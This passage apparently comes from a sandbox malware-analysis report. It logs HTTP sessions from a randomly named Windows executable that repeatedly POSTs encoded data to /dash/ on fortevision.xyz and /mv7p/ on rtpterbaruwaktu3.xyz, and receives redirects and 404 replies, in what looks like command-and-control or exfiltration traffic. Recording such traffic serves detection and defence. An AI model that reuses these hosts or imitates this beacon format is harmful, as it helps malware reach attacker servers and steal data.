                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.fortevision.xyz
                                                                                          Referer: http://www.fortevision.xyz/dash/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 66 7a 76 52 4b 70 67 49 67 42 75 46 44 6f 42 59 42 78 77 33 75 42 76 31 34 50 7a 33 70 35 50 79 47 38 50 70 6d 38 4f 77 54 6c 4f 67 65 39 68 4e 5a 53 57 65 4e 49 32 76 2f 6a 30 2b 39 38 45 78 46 63 2f 75 4a 7a 69 33 74 65 5a 64 65 65 4e 55 50 75 50 6e 63 68 79 7a 66 65 6b 5a 70 75 56 74 65 77 4f 54 32 6f 4c 31 76 53 46 39 64 73 70 41 76 41 78 58 37 41 74 6f 44 6c 75 55 49 4b 6d 5a 4d 2b 63 34 65 4d 4f 67 53 2f 73 50 6b 58 72 41 59 58 2f 53 47 6f 4e 65 33 51 30 6d 4c 2f 6c 67 46 58 39 55 4e 52 4b 56 58 69 67 61 36 69 35 43 49 70 53
                                                                                          Data Ascii: 8z=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkXrAYX/SGoNe3Q0mL/lgFX9UNRKVXiga6i5CIpS


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.54994213.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:05.080709934 CET1766OUTPOST /dash/ HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.fortevision.xyz
                                                                                          Referer: http://www.fortevision.xyz/dash/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 63 54 76 51 2f 6c 67 4a 44 35 75 58 7a 6f 42 53 68 78 78 33 75 42 69 31 2b 6e 4a 33 70 31 31 79 45 30 50 6f 41 67 4f 31 6d 5a 4f 37 4f 39 68 51 4a 54 78 44 39 49 2f 76 38 62 77 2b 35 51 45 78 46 63 2f 75 49 44 69 6d 34 71 5a 62 65 65 53 58 50 75 44 73 38 68 4b 7a 66 58 54 5a 70 72 6f 73 76 51 4f 54 57 34 4c 33 39 36 46 30 64 73 33 42 76 42 78 58 37 4e 7a 6f 46 42 31 55 49 2f 78 5a 4d 47 63 39 37 34 55 30 32 37 52 63 46 48 77 45 36 66 52 49 54 73 4d 65 46 6f 77 6d 4d 50 72 39 56 66 50 57 5a 6c 34 55 30 58 58 4a 38 4b 39 49 50 42 63 54 74 44 73 42 4e 76 4f 53 46 43 4f 59 35 33 2b 76 51 4d 6b 72 55 46 63 49 5a 39 76 67 48 75 59 4b 46 75 51 79 49 58 41 49 49 55 4c 43 48 72 5a 4d 72 39 4c 6e 4f 53 51 52 6b 31 32 4a 45 6a 6e 44 6f 57 45 4e 2b 52 31 43 4a 46 43 32 45 51 46 4b 77 78 68 43 36 74 6a 41 59 4e 38 79 75 7a 48 78 33 73 44 76 56 4d 34 44 59 59 41 74 41 7a 6b 4c 31 65 [TRUNCATED]
                                                                                          Data Ascii: 8z=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZScTvQ/lgJD5uXzoBShxx3uBi1+nJ3p11yE0PoAgO1mZO7O9hQJTxD9I/v8bw+5QExFc/uIDim4qZbeeSXPuDs8hKzfXTZprosvQOTW4L396F0ds3BvBxX7NzoFB1UI/xZMGc974U027RcFHwE6fRITsMeFowmMPr9VfPWZl4U0XXJ8K9IPBcTtDsBNvOSFCOY53+vQMkrUFcIZ9vgHuYKFuQyIXAIIULCHrZMr9LnOSQRk12JEjnDoWEN+R1CJFC2EQFKwxhC6tjAYN8yuzHx3sDvVM4DYYAtAzkL1e8PV0b2qNyQhrB5nAOT/STgXu0imYFG/JZ6aGZZSaaj4zoIjouWp7Dv7YRISiubAdQ+tv46PlbZEYtQAuvTh1mFtdI6zeoGDCwS86M/sl8dd91o9N8qo1HW3sWUjIQI35VcEFuQyM6hzyPt/JMQetlw98niKXkB2Zw2S3dwcyCE5P8VSRYd5sGG6e2zNVg7lcxCQCGIn4Deimr4+6PGBNAjAsoztY3YPdfXemseOsB5a6dhSZ8k6jPUToAU/VikjPO9nDpC6r8BByCYqofhe8Y1R4HnenR1LnokWgj53j+aRqtGiEtJVFjSIggLZs/q+ecHJqz0xacsfdLkcqK/dyj6gL5W3eine3SD7/gzNYh3fsLzN9xxv/0da8OHn5wWVbAk2142hgJq/iUpS3aK2ByqCaoi7duFSOWhxvFc0Z/Z8qXbKDQzRFPATvWulaAPuKyW9raZecpvIWC4jvV4vHeolYsnrY50hZxxNHxuayjSW7tGxotslFi0B+2p1PLmfLuyH2JmL5kGjLP5gGl5fZ1uDu9uYlCL4GMmDkP2F1h/kC2Ydh/Kx49D14SwK97KzC1vEQjvyQDbvlnV0KCfW5LbsDf8cKQ9DYiOKpiTBzq97aum5N0MiBwCRi5tv0GRrRIsM0msYe/am/4khPol05fdidpSJlDCaWE4 [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.54994813.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:07.750142097 CET475OUTGET /dash/?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:08.928010941 CET410INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Sun, 24 Nov 2024 07:21:08 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 270
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 7a 3d 59 4d 48 42 75 64 6f 48 49 55 78 48 2b 75 57 4c 5a 71 6a 42 57 4f 4f 65 7a 49 6e 43 7a 36 41 6b 63 6a 41 49 34 6b 75 6a 54 38 79 71 5a 4d 68 38 50 77 64 43 59 68 55 63 58 46 38 48 6d 37 4e 75 77 4a 72 6b 6d 38 31 4b 30 6b 41 58 68 47 77 55 74 78 31 51 37 72 73 38 65 2f 54 58 5a 49 4d 32 33 64 44 30 2f 4e 52 7a 78 48 52 7a 35 71 58 75 68 34 50 6e 58 62 79 78 59 4f 47 67 72 2b 38 46 76 67 3d 3d 26 61 66 77 58 61 3d 36 6e 6e 48 51 6c 6b 70 72 52 49 4c 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE"}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.549965103.21.221.87802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:15.056694984 CET744OUTPOST /mv7p/ HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                          Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 54 53 53 63 6a 42 30 75 5a 45 6c 38 57 4d 76 4e 42 67 53 6e 38 4a 36 39 6e 45 59 32 46 58 34 68 77 71 44 44 6d 4e 74 6d 56 48 71 34 2b 38 46 59 54 4e 53 31 36 47 2b 45 44 30 72 56 76 74 6e 79 67 77 7a 6b 2b 43 51 4c 34 63 72 4b 5a 6b 70 4c 61 57 78 47 6b 4f 4c 34 53 34 46 70 5a 6b 49 59 65 53 67 2f 38 70 76 2f 58 58 62 32 4f 6f 69 54 5a 45 6c 49 38 52 38 4c 46 4b 66 66 4b 6a 5a 64 6d 4d 4f 49 41 62 49 7a 68 77 34 2f 48 62 4b 6b 2b 63 52 69 78 63 76 51 61 4a 4c 32 56 66 67 79 75 7a 35 50 74 4a 49 76 38 33 74 76 64 75 33 59 56 49 76 34 4e 73 4a 74 4e 4d 3d
                                                                                          Data Ascii: 8z=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRixcvQaJL2Vfgyuz5PtJIv83tvdu3YVIv4NsJtNM=
                                                                                          Nov 24, 2024 08:21:16.653755903 CET1033INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:16 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.549972103.21.221.87802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:17.723059893 CET764OUTPOST /mv7p/ HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                          Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 77 2f 34 68 56 57 44 53 53 52 74 6e 56 48 71 67 4f 39 75 58 7a 4d 2f 31 36 4b 49 45 42 67 72 56 76 35 6e 79 68 41 7a 6b 4a 32 52 4a 6f 63 74 42 35 6b 72 54 36 57 78 47 6b 4f 4c 34 53 38 2f 70 66 4d 49 5a 75 69 67 2f 65 42 73 6a 6e 58 45 69 65 6f 69 5a 35 46 75 49 38 52 65 4c 45 57 35 66 49 72 5a 64 6a 6f 4f 49 53 6a 4c 36 68 77 2b 77 6e 61 7a 30 73 39 5a 72 33 46 36 64 4d 45 31 31 58 4c 6e 7a 59 43 54 56 50 42 67 38 63 62 56 2f 4f 6d 41 4a 6c 70 47 69 75 38 35 7a 61 5a 62 4d 42 4e 63 70 49 7a 47 55 32 65 43 73 58 2b 76 79 73 74 49
                                                                                          Data Ascii: 8z=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cbV/OmAJlpGiu85zaZbMBNcpIzGU2eCsX+vystI
                                                                                          Nov 24, 2024 08:21:19.323393106 CET1033INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:19 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.549980103.21.221.87802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:20.425128937 CET1781OUTPOST /mv7p/ HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                          Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 32 6e 34 68 6e 4f 44 41 44 52 74 6b 56 48 71 2b 2b 39 74 58 7a 4e 39 31 36 43 55 45 42 39 63 56 74 42 6e 7a 48 55 7a 31 73 61 52 54 34 63 74 4f 5a 6b 6d 4c 61 58 72 47 6b 65 50 34 52 55 2f 70 66 4d 49 5a 6f 75 67 6f 63 70 73 77 33 58 62 32 4f 6f 75 54 5a 45 4a 49 39 34 38 4c 48 36 50 63 34 4c 5a 63 44 34 4f 4f 68 62 4c 31 68 77 38 33 6e 61 43 30 73 78 57 72 7a 73 55 64 4d 59 50 31 56 62 6e 2f 2b 6a 65 4a 4f 6f 36 6f 2f 62 44 73 2b 47 51 4c 6b 4a 58 6a 39 51 32 31 6f 38 2b 49 51 74 70 6e 76 2f 53 58 6e 6a 52 37 57 79 2f 31 34 56 42 55 79 6f 48 58 6c 46 34 57 4f 62 45 7a 55 7a 71 30 72 35 69 59 42 32 54 48 70 70 72 43 74 71 2f 41 71 49 4a 34 57 32 53 58 4b 4d 75 6e 74 4e 74 5a 2f 6c 51 49 47 6e 72 72 43 6d 2f 71 58 74 72 66 6d 34 4b 5a 37 50 75 32 61 4e 32 38 49 50 42 76 75 4f 67 71 44 32 71 31 5a 64 38 51 7a 68 76 34 74 78 69 4c 4a 74 64 57 68 7a 30 73 6b 2f 77 77 56 47 [TRUNCATED]
                                                                                          Data Ascii: 8z=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI22n4hnODADRtkVHq++9tXzN916CUEB9cVtBnzHUz1saRT4ctOZkmLaXrGkeP4RU/pfMIZougocpsw3Xb2OouTZEJI948LH6Pc4LZcD4OOhbL1hw83naC0sxWrzsUdMYP1Vbn/+jeJOo6o/bDs+GQLkJXj9Q21o8+IQtpnv/SXnjR7Wy/14VBUyoHXlF4WObEzUzq0r5iYB2THpprCtq/AqIJ4W2SXKMuntNtZ/lQIGnrrCm/qXtrfm4KZ7Pu2aN28IPBvuOgqD2q1Zd8Qzhv4txiLJtdWhz0sk/wwVGq9UeIcHFQ6Nt9/DSv5wpOIOeCgumcdiFpatwzK3owwGceWMnLnvOM0zJYPtDV65iTqsFT3wnWsB7O0b4+TlMGUAuSi0XGPhgPCBIbcxdN+IdKIaL0a8Fp7YSOgtHEAbocwO3AZlEziIxWbT7Uu1qJq2uMgZczsyivS4CmWIy5oSdHgMo2SLb8yovWdIlUyILPLCsgQDddEKGukKGFFEsXkojdTHSGUXlv+SV5Hj3RcuvePD+wbrQYpaIRZM7EV+uWTxWJitPbEnw06cqxNqaM+X2uxTmwQF2YsBMQOch6Xzbu0E7gkOi+kTGC0nHhg8mB0U7nIyBxZPfZmK3Z93oCn+qjnKExekHJTSKYNaoJSmT9Lph9Q+1i6s0Il9amQ6GwDkMml16Llw5+LMj0ASKh/cqp4cljdX24KoHx06NlMIQTLA4MIa6bIS37UFI+i7xkocPzM40oE1XvhCNqVDMgUdljtJXlsp/p2nys122KFtuCm8qxfce5AuJS4fi4oDsMyJ8U7hnC/r1inAGnODIIh7jRSj8YaWScMMpdDBiP6/T4nz+Kye5eoxlAsJQbZlc57sjYUzkj/FbrqX11JPAiFrAqmoo51l0cEUHIkVrord/LXhxO5nYsKpMdpqTUq9YCKcdRKS0/zmDuYYH5shWN3WJTsR/FszRoZ [TRUNCATED]
                                                                                          Nov 24, 2024 08:21:22.021486044 CET1033INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:21 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.549987103.21.221.87802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:23.090171099 CET480OUTGET /mv7p/?8z=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJq8TGuAoUt3aFnOU+z5Bj5RQAf/d4rkt/TznqZIVeIVhXw==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:24.654767036 CET1033INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:24 GMT
                                                                                          server: LiteSpeed
